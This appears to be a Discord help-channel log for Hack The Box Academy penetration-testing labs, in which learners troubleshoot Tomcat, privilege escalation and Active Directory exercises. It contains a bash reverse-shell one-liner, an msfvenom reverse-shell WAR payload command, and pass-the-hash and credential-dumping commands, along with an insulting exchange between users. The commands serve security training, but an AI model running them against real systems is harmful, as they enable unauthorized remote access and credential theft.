didn’t bruteforce tomcat btw
creds search tomcat
I did it manually 1 by 1 and none of them worked for me
I'm not sure how to get to that
linux priv esc/skills assessment...
msf6 exploit(multi/http/tomcat_mgr_deploy)
[-] Execution failed on HSrpydkGb [500 ]
I also get 500 error when i upload war file onto tomcat... help please
SERVER-SIDE ATTACKS
Blind SSRF Exploitation Example
The target is vulnerable to blind SSRF. Leverage this blind SSRF vulnerability to interact with internal.app.local and achieve remote code execution against the internal service listening on port 5000, as you did in the previous section. Submit the kernel release number as your answer (Answer format: X.X.X-XX)
I can't solve this in the way that the module describes because it doesn't contain the same web app or anything similar. It literally contains the web page of the previous section "Bad App"
Can anyone help?
echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14,110 1234 > /tmp/f" >> monitor.sh can anyone please help me walk through and understand what this code snippet for python reverse shell is doing? is this even the correct way to do it for nibbles? sorry im a script kiddy
this isn't a python revshell, it's bash
im using python shell to enter this into monitor.sh file
but yes im sry that was incorrect
doesnt matter
will it work with ncat?
you're not really using a python shell - python was just used to give you a more interactive environment
right
there's a comma instead of a period
10.10.14,110
i caught that in my attempts when i added my ip and port
but it still didnt work
i copied this from a website that was a walkthrough
the best one ive seen and used but still
do you mean the nibbles walkthrough from the getting-started module?
ok so a semicolon indicates the end of a set of commands
you can do man <command> to find out what each individual command does
oh okay! i didnt think of that
but in short: it creates a pipeline that's redirected to a privileged bash shell which then connects to your IP at PORT (2>&1 is a bash redirect stderr+stdout iirc)
the >> appends it to the monitor.sh (a bash file)
when i add this to monitor.sh does that activate it? bc i have my terminal set nc -nlvp <PORT> and nothing happens
are you already using that port for your initial connection?
if so you'll need to adjust the port
:)
hmm idk it was port 1234
"it was" don't just copy/paste
i understand
for your initial connection command to the user: did you listen on 1234
if so you'll need to adjust the port on your revshell command to listen on a different port
i dont know ill have to do it all again and be mindful of ports. but now i know where i could have gone wrong
nc ip port
thank you
that's the basic schema of netcat
nc ip port?
for using netcat (nc) to connect to a port you provide it 2 arguments; an IP and a PORT
gotcha. these walkthroughs use shortcuts that convolute what's going on
the getting-started module isn't really going to teach you a whole bunch
it's just to get your feet wet
its really frustrated me
but tbh you should do the Information Security Foundations Path or at least Linux Fundamentals
i understand all of it but i just dont get results from the terminal
i am doing linux fundamentals. almost done and i really enjoyed that module
i plan on getting into soc analyst stuff
this is what that module is expecting as pre-requisites
i got some of those completed ill go back and see which ones i dont
so sudo echo etc...
no
sudo -l?
sudo ./monitor.sh
i assure you it is
ok let me reread it
it's right after it tells you to echo the command
it shows he got access to the root before he sudos
nope
gotcha
he did not have access to root before sudo
sudo -l lists all commands that the user can run with sudo privs
so you have to run monitor.sh with the echo in it
ok
ok
after that it's really just as simple as sudo monitor.sh
it makes perfect sense
i knew there was something i was missing. thank you for the help
you just had the puzzle piece upside-down
there's a SOC Analyst Pre-requisite path btw
what's better, nmap or metasploit, and what do people use such programs for?
they both perform functionally different things
nmap is good for general querying of an IP for common (or all) ports
metasploit is just basically a repository of known exploits for existing CVEs and such
(there's a fair bit more you can do)
but for the most part msfconsole is mostly used by people who don't care to read how a PoC exploit works
im excited about sherlock in the future after this path is completed further
what are cves ?
use google
this channel is for assistance with academy modules; not general chatter
sry
alright thanks
msf6 exploit(multi/http/tomcat_mgr_deploy) > exploit
[-] Execution failed on cGGZnd5T2T4iiCj92n15 [500 ]
anyone know how to fix this? I can't find one
make sure your options are set correctly
is this the Shells/Payloads live engagement?
i tried my options every which way
this is for flag5 in linux priv esc/ skills assessment
😦
500 error is odd though
do it yourself, much easier and less things can go wrong
then you might need to use a diff vpn region; could just be that it's being dumb - are you using pwnbox or your own vm
have you tried logging on to tomcat in the browser?
are you catching it with a listener
are the lhost and ports right?
RHOSTS 10.129.134.239 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
LHOST 10.10.15.40 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
wait are you doing it through metasploit or through the browser?
can get a revshell
to escalate to root so im using msf to rev shell
If you can get a revshell what’s the problem
^
webshell
using msf won't magically make it an escalated shell
It’s not like msf will magically give you root
upgrade it as in upgrading to meterpreter?
i have a webshell on tomcat and can use commands like cat and ls
but nothing else works
Do you have a web shell or a revshell
webshell
Why don’t you just upload a revshell?
i think i did
msfvenom -p java/shell_reverse_tcp lhost=10.10.15.40 lport=4321 -f war -o pwn.war
If you think you did it wouldn’t be a web shell would it
And you set up a listener and then go to there?
And you get a call back?
okay i think i missed something, let me try thanks
I am actually confused
If you set up a listener and get a callback when you browse to it, it’s a revshell
this revshell is incorrect
java/jsp_shell_reverse_tcp
incorrect payload == skill issue
i had to double-check with the example from the shells & payloads module
thanks 🙂
but as soon as i saw the payload option it just didn't look right to me lol
Common applications literally gives the msfvenom command
¯_(ツ)_/¯
Yeah something was off
i was like that looks almost correct
thanks
i just couldn't remember if it was java/jsp/shell_reverse_tcp or java/jsp_shell_reverse_tcp
brain is fried
Yeah I knew the payload was literally in the attacking tomcat section from attacking common applications
neat: i just referred to shells/payloads since the live engagement has something similar
are you entering the user and pass right?
I am copying and pasting the pass I will check user...
I use secretsdump.py, not sure if that makes a difference, but it seems like your login is invalid so perhaps you don’t paste the pass correctly
you can use '<Domain>/<Username>:<Password>@<dc>'
Okay, I will try when I try secretsdump.py it throws errors bc of my python setup
This path is completed
I think they meant when they get further in the path?
Ahh
But it can be vague in this case
@next bronze is it not the same cleartext password found earlier in the module?
ah
Try putting it in '
use forward slash, backslash is an escape character in bash
The pass
that too
Okie dokie, pray for me! lol
you're actually passing INLANERIGHT.LOCALt*** as the user
Thanks guys huge help
Escape characters are the bane of my existence this is not the first time
Could I have used '\' as well?
You'd need to double it
omg Discord just cancelled it i mean two backslashes in a row
yes 2 of them works edit: no it doesn't
Yeah discord uses markdown and \ is an escape character
It's how I get away with telling people to wrap things in backticks
`like this`
like this

I don't think impacket does \\, you need to use /
I have a 60% keyboard and backticks are not working right now which is a brand new issue lol
are things like a user being able to run openssl with sudo considered a flaw?
do we have to report them?
¯_(ツ)_/¯
because the real flaw was the RCE to get there
I wouldn't but it depends
on what
Defense in depth methodology
Just because something isn't exploitable without an attack chain to get to that point doesn't mean it shouldn't get fixed
The room across from me is on fire, but my door is closed and I'm not in that room so it's not a problem.
🔥 🚪 
SERVER-SIDE ATTACKS
Blind SSRF Exploitation Example
The target is vulnerable to blind SSRF. Leverage this blind SSRF vulnerability to interact with internal.app.local and achieve remote code execution against the internal service listening on port 5000, as you did in the previous section. Submit the kernel release number as your answer (Answer format: X.X.X-XX)
I can't solve this in the way that the module describes because it doesn't contain the same web app or anything similar. It literally contains the web page of the previous section "Bad App"
Can anyone help?
Guys im doing the dancing starting point box and i'm at the very end, i'm following the walkthrough completely and it wont work, it either says I dont have enough
#starting-point read #welcome to find out how to access
The first channel it says I dont have access to it
Hence the second part of my message
Reading comprehension is hard, I know
@next bronze I tried this to get the admin flag but it's still the flag for MS01. Is this not the right way to do it I am guessing?
dc01 is not the domain, where are you running mimikatz on?
I am running it on the MS01 machine
when you use ::pth with mimikatz, it opens another terminal with the user you pth as, but the terminal is still running in the same machine, just that the user is different, you don't just magically get a shell on another computer
Okay I should use psexec then?
but since the user is different, you can PSremote, or access the smb as that user to a remote machine, DC, in this case
You’re on the last question?
Yes
You got the hash from secretsdump, why don’t you just proxychains evilwinrm
I misunderstood so you have to be a stuck up lil bitch about it? okay
I will try that or @next bronze tip, thanks!
there are many ways to do things in AD
You misunderstood him literally saying ‘read #welcome to find out how to access’?
You sound like the stuckup bitch thinking you know everything loser
True that
ego so fragile gunna cry about having to read
Don't need to be so hostile my guy.
wah wah
But I get it, Woman bad, REEEEEEE
You came for me first and since I said something back I did it because you're a woman? And my comprehension skills are bad?
Oh boy
What did you expect, for me to just let you insult me? nahh
timothy doesn't get enough attention at home 😢
if youre this thin skin consider a different field. It requires higher mental fortitude than this
You were the one insulting
Because my initial comment explained how to find out how to access the "no access" channel
This guy must have a Security+ cert knowing so much lol
I have given people shit for less
so let me get this straight, in this field if someone insults you you're supposed to just let them?
Yes, if you’re the one being dumb
If you're too incompetent to follow directions then yes
@thorn urchin can you take my CPTS for me I'm lazy 
Usually if I'm calling you out. It's for a reason: in this case, you didn't read the whole message
who even insulted you? saying reading comprehension is hard is an insult? 
when you were the one in the wrong? Yeah pretty much.
99.9999% of the time I'll just say skill issue
You literally could have just gone 'oh whoops my mistake. thanks' and everything would have been fine
ParrotSec Discord regarding kernel panic on upgrading from 5.3 to 6.x
When the solution is literally pinned
Palinuro is working on a fix for architect getting stuck on install
And she literally could've just said "Hence the second part of my message" and I would've recognized my mistake and went on with my day, which I was going to do until she decided to come for me
Cry more
You're going to have it rough in here from now on. Are you glad you disrespected people that can help you?
It's called poking fun, I expect people to give me the same level of shit when I miss the obvious
relax my guy, we do dumb things all the time, trying to fight people who pointed it out is not the way to go
You cant live in this industry with such a sensitive ego. Youll do nothing but encounter enemies that coulda been friends
I.e. 'but why are you trying to remote... is that the question?"
But you decided to come for me!!
All this shit is off topic anyways
I fail to read things, often
Alright Marcie, I apologize for calling you a bitch. I didn't see it as poking fun because i'm used to defending myself
See wasnt hard
when people say similar things
Anyway f0x take my exam for me, I'll pay you in 2 pennies
No
3?
3 pennies
Sweet I got that much at least
I’m Ronnie Pickering!!!
read my writeup: https://0xfa7e.github.io/post/cpts-vs-oscp/
An in depth comparison of CPTS vs OSCP
(I was referencing the guy that wanted to ask about my 'writeup' when he meant blog)
Nice writeup, Public, bold
evilwinrm is magic
Got it?
Yeah I tried another way but it was very complex whereas EvilWinRM was so simple
Will probably look into the other ways just for knowledge but for now I am moving on lol
there's an even simpler way
nxc smb ip -u user -p pass -x 'type C:\flag.txt'
But I don't have pass? Would I use the t*** user?
-H hash
Wowza, passing the hash is truly mind blowing!
an ntlm hash is as good as a password in most situations
That's really what I've had to realize with that last question. Thought I'd have to make a golden ticket and all this stuff just to use PSexec. I am sure that's not true as well?
btw for this it should just be
type \\dc-ip\C$\flag.txt
once you pth with mimikatz
Ah I tried that but I was using DC01.INLANEFREIGHT.LOCAL instead of IP
golden ticket is for stealth and persistence, you can pth with psexec
that should work, inside the domain you just need the hostname, so DC01
I was also trying to use 'ls' which is probably why I abandoned that route. Stupidly didn't consider that it was a windows machine.
ls works for powershell, just switch to that
Oh it's because I was in CMD when I did ::pth
is there a way to get it to spawn powershell instead of CMD?
you literally just type powershell and enter
^
and vice versa
LOL, I just accepted defeat right at the finish line
dw there's still skills assessment 2 
Yeah super excited for that one.
try using ligolo for that
My only question is the only benefit of Ligolo that you don't have to configure proxychains?
And then you don't have to use proxychains for every command?
I wouldnt say thats the only benefit
yes, you can also use ICMP and normal nmap through it, and it makes it very easy to set up reverse shells
yep ligolo is so damn good
Id go back to the pivoting skills assessment, it’s a great place to learn it
Yeah mistakenly thought I could set the CPTS course aside for a bit while I wrapped up college but now I realize I should have powered through.
knowledge decay is unreal
Can't decay in knowledge if I have none
(My main reason for no decay is assisting here)
Yeah my work doesn't let me use any of these skills so they just disappeared. Sayonara!
also take notes, makes it much easier to remember and refer back to things
When my antivirus isn't blocking all my notes LOL. Solved that issue but was a headache
Fun fact: for a few months, I was using my notes to assist, solely
Add your notes folder to exceptions
yeah there's no way to remember all the things
Me: waiting for @quiet heart to finish typing 
Yeah notes is very helpful to retain knowledge, especially if you use them to help here
Writing an essay
^
Likely a large code block which automod just detects as spam for unlinked users
Or a whole bunch of text
Or just a .
yes i see MEE6 bot send to me: @quiet heart, don't send the same message over and over again! :ANGRY6:
Verify your account following #welcome
hello for https://academy.hackthebox.com/module/19/section/108 I'm confused, which indicator should the CVE list?
?
cve list?
i find it but this is not the answer
CVEs have nothing to do with this exercise
Yeah you're looking for a flag using NMAP
i wonder why
That CVE is a DoS attack
when I said cve list I meant this
okay
Yeah you're focused on using nmap to look for a HTB flag
^ /robots.txt is usually a good look too
/robots.txt
ah but it's it's the previous flag, isn't it, that we find when intercepting traffic?
No?
